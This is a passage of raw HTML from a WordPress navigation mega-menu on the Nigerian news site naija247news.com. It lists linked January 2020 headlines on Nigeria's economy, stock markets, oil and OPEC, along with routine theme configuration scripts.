id=td_uid_10_5e2cc0f8eb246 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/economy-nigeria-debt-stock-hits-26-21-trillion-in-q3-2019-as-analysts-back-mpcs-crr-raise-by-27-50/" rel="bookmark" title="ECONOMY: Nigeria Debt Stock Hits 26.21 Trillion in Q3 2019 as Analysts back MPC&#8217;s CRR Raise by 27.50%…"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="ECONOMY: Nigeria Debt Stock Hits 26.21 Trillion in Q3 2019 as Analysts back MPC&#8217;s CRR Raise by 27.50%…"/></a></div>                <a href="https://naija247news.com/category/economy/economic-indicators/" class="td-post-category">Economic Indicators</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/economy-nigeria-debt-stock-hits-26-21-trillion-in-q3-2019-as-analysts-back-mpcs-crr-raise-by-27-50/" rel="bookmark" title="ECONOMY: Nigeria Debt Stock Hits 26.21 Trillion in Q3 2019 as Analysts back MPC&#8217;s CRR Raise by 27.50%…">ECONOMY: Nigeria Debt Stock Hits 26.21 Trillion in Q3 2019 as&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/fact-sheet-of-nigerias-mpc-decision-to-increases-crr-by-500bps-to-27-50/" rel="bookmark" title="Fact sheet of Nigeria&#8217;s MPC decision to Increases CRR by 500bps to 27.50%"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/07/Godwins4.reutersmedia.net_.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/07/Godwins4.reutersmedia.net_.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/07/Godwins4.reutersmedia.net_.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Fact sheet of Nigeria&#8217;s MPC decision to Increases CRR by 500bps to 27.50%"/></a></div>                <a href="https://naija247news.com/category/economy/economic-indicators/" class="td-post-category">Economic Indicators</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/fact-sheet-of-nigerias-mpc-decision-to-increases-crr-by-500bps-to-27-50/" rel="bookmark" title="Fact sheet of Nigeria&#8217;s MPC decision to Increases CRR by 500bps to 27.50%">Fact sheet of Nigeria&#8217;s MPC decision to Increases CRR by 500bps&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/mass-notorious-evictions-prompt-protests-as-nigerian-housing-crisis-worsens/" rel="bookmark" title="Mass notorious evictions prompt protests as Nigerian housing crisis worsens"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/p073f4jj.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/p073f4jj.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/p073f4jj.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Mass notorious evictions prompt protests as Nigerian housing crisis worsens"/></a></div>                <a href="https://naija247news.com/category/economy/infrastructure/real-estate/" class="td-post-category">Real Estate</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/mass-notorious-evictions-prompt-protests-as-nigerian-housing-crisis-worsens/" rel="bookmark" title="Mass notorious evictions prompt protests as Nigerian housing crisis worsens">Mass notorious evictions prompt protests as Nigerian housing crisis worsens</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/nec-committee-seeks-memoranda-from-nigerians-over-status-of-discos/" rel="bookmark" title="NEC committee seeks memoranda from Nigerians over status of DisCos"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Power-Nigeria.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Power-Nigeria.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Power-Nigeria.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="NEC committee seeks memoranda from Nigerians over status of DisCos"/></a></div>                <a href="https://naija247news.com/category/economy/infrastructure/power-infrastructure/" class="td-post-category">Power</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/nec-committee-seeks-memoranda-from-nigerians-over-status-of-discos/" rel="bookmark" title="NEC committee seeks memoranda from Nigerians over status of DisCos">NEC committee seeks memoranda from Nigerians over status of DisCos</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_10_5e2cc0f8eb246" data-td_block_id="td_uid_10_5e2cc0f8eb246"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_10_5e2cc0f8eb246" data-td_block_id="td_uid_10_5e2cc0f8eb246"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-214566"><a href="https://naija247news.com/category/markets-2/">Markets</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_29_5e2cc0f8f1a7d_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_29_5e2cc0f8f1a7d" ><script>var block_td_uid_29_5e2cc0f8f1a7d = new tdBlock();
block_td_uid_29_5e2cc0f8f1a7d.id = "td_uid_29_5e2cc0f8f1a7d";
block_td_uid_29_5e2cc0f8f1a7d.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"26","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_29_5e2cc0f8f1a7d_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_29_5e2cc0f8f1a7d_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_29_5e2cc0f8f1a7d.td_column_number = "3";
block_td_uid_29_5e2cc0f8f1a7d.block_type = "td_block_mega_menu";
block_td_uid_29_5e2cc0f8f1a7d.post_count = "4";
block_td_uid_29_5e2cc0f8f1a7d.found_posts = "657";
block_td_uid_29_5e2cc0f8f1a7d.header_color = "";
block_td_uid_29_5e2cc0f8f1a7d.ajax_pagination_infinite_stop = "";
block_td_uid_29_5e2cc0f8f1a7d.max_num_pages = "165";
tdBlocksArray.push(block_td_uid_29_5e2cc0f8f1a7d);
</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d" id="td_uid_30_5e2cc0f8f35ac" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="" href="https://naija247news.com/category/markets-2/">All</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_31_5e2cc0f8f35f0" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="11" href="https://naija247news.com/category/markets-2/african-exchanges/">African Exchanges</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_32_5e2cc0f8f3626" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="14" href="https://naija247news.com/category/markets-2/asia-stock-exchange/">Asia Stock Exchange</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_33_5e2cc0f8f365b" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="568" href="https://naija247news.com/category/markets-2/capital-markets/">Capital Markets</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_34_5e2cc0f8f36f3" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="262" href="https://naija247news.com/category/markets-2/emerging-markets/">Emerging Markets</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_35_5e2cc0f8f3721" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="12" href="https://naija247news.com/category/markets-2/london-stock-exchange/">London Stock Exchange</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_36_5e2cc0f8f375e" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="13" href="https://naija247news.com/category/markets-2/new-york-stock-exchange/">New York Stock Exchange</a><a class="mega-menu-sub-cat-td_uid_29_5e2cc0f8f1a7d"  id="td_uid_37_5e2cc0f8f3792" data-td_block_id="td_uid_29_5e2cc0f8f1a7d" data-td_filter_value="10" href="https://naija247news.com/category/markets-2/nigeria-stock-exchange/">Nigeria Stock Exchange</a></div></div><div id=td_uid_29_5e2cc0f8f1a7d class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/25/local-equities-market-gains-0-03-amid-sustained-bullish-activity/" rel="bookmark" title="Local Equities Market Gains 0.03% amid Sustained Bullish Activity…"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/BearsStockMarketNSE.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/BearsStockMarketNSE.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/BearsStockMarketNSE.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Local Equities Market Gains 0.03% amid Sustained Bullish Activity…"/></a></div>                <a href="https://naija247news.com/category/markets-2/nigeria-stock-exchange/" class="td-post-category">Nigeria Stock Exchange</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/25/local-equities-market-gains-0-03-amid-sustained-bullish-activity/" rel="bookmark" title="Local Equities Market Gains 0.03% amid Sustained Bullish Activity…">Local Equities Market Gains 0.03% amid Sustained Bullish Activity…</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/latin-american-assets-dip-as-china-virus-fears-diminish-risk-appetite/" rel="bookmark" title="Latin American assets dip as China virus fears diminish risk appetite"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T144006Z_1_NL4_RTRLXPP_2_LYNXPACKAGER.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T144006Z_1_NL4_RTRLXPP_2_LYNXPACKAGER.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T144006Z_1_NL4_RTRLXPP_2_LYNXPACKAGER.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Latin American assets dip as China virus fears diminish risk appetite"/></a></div>                <a href="https://naija247news.com/category/markets-2/emerging-markets/" class="td-post-category">Emerging Markets</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/latin-american-assets-dip-as-china-virus-fears-diminish-risk-appetite/" rel="bookmark" title="Latin American assets dip as China virus fears diminish risk appetite">Latin American assets dip as China virus fears diminish risk appetite</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/wall-street-set-for-weekly-loss-on-gathering-virus-fears/" rel="bookmark" title="Wall Street set for weekly loss on gathering virus fears"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/15c6a0f5650d4f6b39a0a34b65e9a0f7.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/15c6a0f5650d4f6b39a0a34b65e9a0f7.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/15c6a0f5650d4f6b39a0a34b65e9a0f7.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Wall Street set for weekly loss on gathering virus fears"/></a></div>                <a href="https://naija247news.com/category/markets-2/new-york-stock-exchange/" class="td-post-category">New York Stock Exchange</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/wall-street-set-for-weekly-loss-on-gathering-virus-fears/" rel="bookmark" title="Wall Street set for weekly loss on gathering virus fears">Wall Street set for weekly loss on gathering virus fears</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/lagos-shares-market-revs-by-0-13-amid-sustained-bargain-hunting/" rel="bookmark" title="Lagos Shares Market Revs by 0.13% amid Sustained Bargain Hunting"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/NSE.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/NSE.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2019/04/NSE.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Lagos Shares Market Revs by 0.13% amid Sustained Bargain Hunting"/></a></div>                <a href="https://naija247news.com/category/markets-2/nigeria-stock-exchange/" class="td-post-category">Nigeria Stock Exchange</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/lagos-shares-market-revs-by-0-13-amid-sustained-bargain-hunting/" rel="bookmark" title="Lagos Shares Market Revs by 0.13% amid Sustained Bargain Hunting">Lagos Shares Market Revs by 0.13% amid Sustained Bargain Hunting</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_29_5e2cc0f8f1a7d" data-td_block_id="td_uid_29_5e2cc0f8f1a7d"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_29_5e2cc0f8f1a7d" data-td_block_id="td_uid_29_5e2cc0f8f1a7d"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-214550"><a href="https://naija247news.com/category/oil-energy/">Energy</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_38_5e2cc0f9021c2_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_38_5e2cc0f9021c2" ><script>var block_td_uid_38_5e2cc0f9021c2 = new tdBlock();
block_td_uid_38_5e2cc0f9021c2.id = "td_uid_38_5e2cc0f9021c2";
block_td_uid_38_5e2cc0f9021c2.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"179","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_38_5e2cc0f9021c2_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_38_5e2cc0f9021c2_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_38_5e2cc0f9021c2.td_column_number = "3";
block_td_uid_38_5e2cc0f9021c2.block_type = "td_block_mega_menu";
block_td_uid_38_5e2cc0f9021c2.post_count = "4";
block_td_uid_38_5e2cc0f9021c2.found_posts = "2381";
block_td_uid_38_5e2cc0f9021c2.header_color = "";
block_td_uid_38_5e2cc0f9021c2.ajax_pagination_infinite_stop = "";
block_td_uid_38_5e2cc0f9021c2.max_num_pages = "596";
tdBlocksArray.push(block_td_uid_38_5e2cc0f9021c2);
</script><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2" id="td_uid_39_5e2cc0f90528c" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="" href="https://naija247news.com/category/oil-energy/">All</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_40_5e2cc0f9052cd" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="186" href="https://naija247news.com/category/oil-energy/analysis-oil-gas/">Analysis</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_41_5e2cc0f905300" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="556" href="https://naija247news.com/category/oil-energy/ceraweek2018/">CERAWeek2018</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_42_5e2cc0f90532c" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="331" href="https://naija247news.com/category/oil-energy/investing/">Investing</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_43_5e2cc0f905356" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="184" href="https://naija247news.com/category/oil-energy/news/">News</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_44_5e2cc0f90537e" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="185" href="https://naija247news.com/category/oil-energy/opec/">OPEC</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_45_5e2cc0f9053a5" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="32" href="https://naija247news.com/category/oil-energy/power/">Power</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_46_5e2cc0f9053cd" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="419" href="https://naija247news.com/category/oil-energy/renewal-energy/">Renewal Energy</a><a class="mega-menu-sub-cat-td_uid_38_5e2cc0f9021c2"  id="td_uid_47_5e2cc0f9053f4" data-td_block_id="td_uid_38_5e2cc0f9021c2" data-td_filter_value="330" href="https://naija247news.com/category/oil-energy/shale-oil/">Shale Oil</a></div></div><div id=td_uid_38_5e2cc0f9021c2 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/oil-drops-more-than-2-approaches-weekly-loss-on-china-virus-fears/" rel="bookmark" title="Oil drops more than 2%, approaches weekly loss on China virus fears"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T023224Z_1_LYNXMPEG0N03T_RTROPTP_3_GLOBAL-OIL.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T023224Z_1_LYNXMPEG0N03T_RTROPTP_3_GLOBAL-OIL.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/2020-01-24T023224Z_1_LYNXMPEG0N03T_RTROPTP_3_GLOBAL-OIL.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Oil drops more than 2%, approaches weekly loss on China virus fears"/></a></div>                <a href="https://naija247news.com/category/oil-energy/news/" class="td-post-category">News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/oil-drops-more-than-2-approaches-weekly-loss-on-china-virus-fears/" rel="bookmark" title="Oil drops more than 2%, approaches weekly loss on China virus fears">Oil drops more than 2%, approaches weekly loss on China virus&#8230;</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/nigeria-petroleum-minister-inaugurates-national-gas-committee/" rel="bookmark" title="Nigeria Petroleum Minister inaugurates National Gas Committee"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Sylva.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Sylva.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Sylva.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Nigeria Petroleum Minister inaugurates National Gas Committee"/></a></div>                <a href="https://naija247news.com/category/oil-energy/news/" class="td-post-category">News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/nigeria-petroleum-minister-inaugurates-national-gas-committee/" rel="bookmark" title="Nigeria Petroleum Minister inaugurates National Gas Committee">Nigeria Petroleum Minister inaugurates National Gas Committee</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/nigeria-is-ready-to-comply-completely-with-opec-cuts-target-sylva/" rel="bookmark" title="Nigeria Is ‘Ready to Comply Completely’ With OPEC Cuts Target: Sylva"><img width="218" height="150" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/1x-1.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/1x-1.jpg?resize=218%2C150&#038;ssl=1 218w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/1x-1.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Nigeria Is ‘Ready to Comply Completely’ With OPEC Cuts Target: Sylva"/></a></div>                <a href="https://naija247news.com/category/oil-energy/opec/" class="td-post-category">OPEC</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/nigeria-is-ready-to-comply-completely-with-opec-cuts-target-sylva/" rel="bookmark" title="Nigeria Is ‘Ready to Comply Completely’ With OPEC Cuts Target: Sylva">Nigeria Is ‘Ready to Comply Completely’ With OPEC Cuts Target: Sylva</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/italy-tax-police-search-offices-of-eni-managers-in-obstruction-probe-sources/" rel="bookmark" title="Italy tax police search offices of Eni managers in obstruction probe -sources"><img width="218" height="150" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2019/07/Ceo-Eni.jpg?resize=218%2C150&#038;ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2019/07/Ceo-Eni.jpg?resize=218%2C150&#038;ssl=1 218w, https://i2.wp.com/naija247news.com/wp-content/uploads/2019/07/Ceo-Eni.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="Italy tax police search offices of Eni managers in obstruction probe -sources"/></a></div>                <a href="https://naija247news.com/category/oil-energy/news/" class="td-post-category">News</a>            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/italy-tax-police-search-offices-of-eni-managers-in-obstruction-probe-sources/" rel="bookmark" title="Italy tax police search offices of Eni managers in obstruction probe -sources">Italy tax police search offices of Eni managers in obstruction probe&#8230;</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_38_5e2cc0f9021c2" data-td_block_id="td_uid_38_5e2cc0f9021c2"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_38_5e2cc0f9021c2" data-td_block_id="td_uid_38_5e2cc0f9021c2"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-290046"><a href="https://naija247news.com/category/politics/">Politics</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-13"><a href="https://naija247news.com/category/world/">World</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_48_5e2cc0f907b7a_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_48_5e2cc0f907b7a" ><script>var block_td_uid_48_5e2cc0f907b7a = new tdBlock();
block_td_uid_48_5e2cc0f907b7a.id = "td_uid_48_5e2cc0f907b7a";
block_td_uid_48_5e2cc0f907b7a.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"2","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_48_5e2cc0f907b7a_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_48_5e2cc0f907b7a_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_48_5e2cc0f907b7a.td_column_number = "3";
block_td_uid_48_5e2cc0f907b7a.block_type = "td_block_mega_menu";
block_td_uid_48_5e2cc0f907b7a.post_count = "4";
block_td_uid_48_5e2cc0f907b7a.found_posts = "3411";
block_td_uid_48_5e2cc0f907b7a.header_color = "";
block_td_uid_48_5e2cc0f907b7a.ajax_pagination_infinite_stop = "";
block_td_uid_48_5e2cc0f907b7a.max_num_pages = "853";
tdBlocksArray.push(block_td_uid_48_5e2cc0f907b7a);
